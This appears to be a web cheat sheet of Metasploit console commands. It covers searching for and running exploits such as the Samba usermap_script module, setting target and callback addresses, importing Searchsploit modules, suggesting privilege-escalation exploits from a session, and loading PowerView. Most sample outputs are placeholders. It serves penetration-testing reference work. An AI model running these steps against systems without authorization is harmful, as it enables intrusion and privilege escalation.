TLDRBins TLDRBins / Metasploit

Usage Tips:

  • Click on a keyword to enable inline editing.
  • Click inside a code block to copy (excludes comments).
  • Use the button to view examples.
  • Click outside to collapse all examples.

Start Msfconsole

msfconsole -q

Sample Output:
TO-DO

General

# Return to previous page
back

Sample Output:
TO-DO
# Upgrade session
sessions -u

Sample Output:
TO-DO
# Quit
exit

Sample Output:
TO-DO

Search Exploit

search <KEYWORD>

Sample Output:
search samba

use <NUM>

Sample Output:
use 15

# Choose by full path
use <MODULE_PATH>

Sample Output:
use exploit/multi/samba/usermap_script

# Show exploit settings
options

Sample Output:
TO-DO
# Set option, e.g.
set rhosts <TARGET>

Sample Output:
TO-DO
set lhost <LOCAL_IP>

Sample Output:
TO-DO
set lport <LOCAL_PORT>

Sample Output:
TO-DO
# Run exploit
run 

Sample Output:
TO-DO

Hint: If you see a session is opened, but sit at an empty line, just type your cmd and press enter

Add Scripts from Searchsploit

mkdir -p ~/.msf4/modules/exploits/linux

Sample Output:
TO-DO
mkdir -p ~/.msf4/modules/exploits/windows

Sample Output:
TO-DO
# For example a linux script
cp <SCRIPT> ~/.msf4/modules/exploits/linux

Sample Output:
cp 12345.rb ~/.msf4/modules/exploits/linux

# Inside msfconsole
reload_all

Sample Output:
TO-DO
# Search
search <SCRIPT>

Sample Output:
TO-DO

Fix No Search Result

# Inside msfconsole, check db status
db_status

Sample Output:
TO-DO
sudo service postgresql start

Sample Output:
TO-DO
update-rc.d postgresql enable

Sample Output:
TO-DO
sudo msfdb init

Sample Output:
TO-DO
# Go back to msfconsole and check again
db_status

Sample Output:
TO-DO

General

# Return from meterpreter
background

Sample Output:
TO-DO

Use Exploit

# Quick look of potential privesc (Windows)
# Need to return from meterpreter
use post/multi/recon/local_exploit_suggester

Sample Output:
TO-DO
# Select opened session
set session 1

Sample Output:
TO-DO
# Show exploit settings
options

Sample Output:
TO-DO
# Set option, e.g.
set rhosts <TARGET>

Sample Output:
TO-DO
# Run exploit
run 

Sample Output:
TO-DO

Use Powershell Module

# Use powershell module
use powershell

Sample Output:
TO-DO
# Import module
powershell_import /usr/share/windows-resources/powersploit/Recon/PowerView.ps1

Sample Output:
TO-DO
# Spawn powershell session
powershell_shell 

Sample Output:
TO-DO